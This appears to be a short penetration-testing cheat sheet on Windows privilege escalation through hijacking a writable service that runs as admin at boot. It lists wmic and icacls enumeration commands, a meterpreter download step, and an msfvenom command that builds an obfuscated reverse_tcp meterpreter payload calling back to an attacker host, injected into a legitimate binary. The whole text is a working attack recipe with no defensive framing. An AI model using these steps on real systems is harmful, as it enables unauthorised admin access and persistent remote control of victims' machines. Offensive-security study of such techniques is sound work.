Identify a service that runs with admin privileges and automatically starts at boot and replace its executable. Binary has to be in a path where we have write privileges.
wmic service list brief # Brief overview of installed services
wmic service > serv_list.txt
meterpreter > download //<path_to>/serv_list.txt
# Inspecting the entire list can take ages so we need to filter based on write privileges
icacls C:\\windows\\system32 # This will show privileges for system32 folder
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name > C:\\Users\\els\\filt_serv.txt
# Download the above file and check for write privileges/h3
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe x86/shikata_ga_nai -i 15 -k -x <binary>.exe > <output_binary>.exe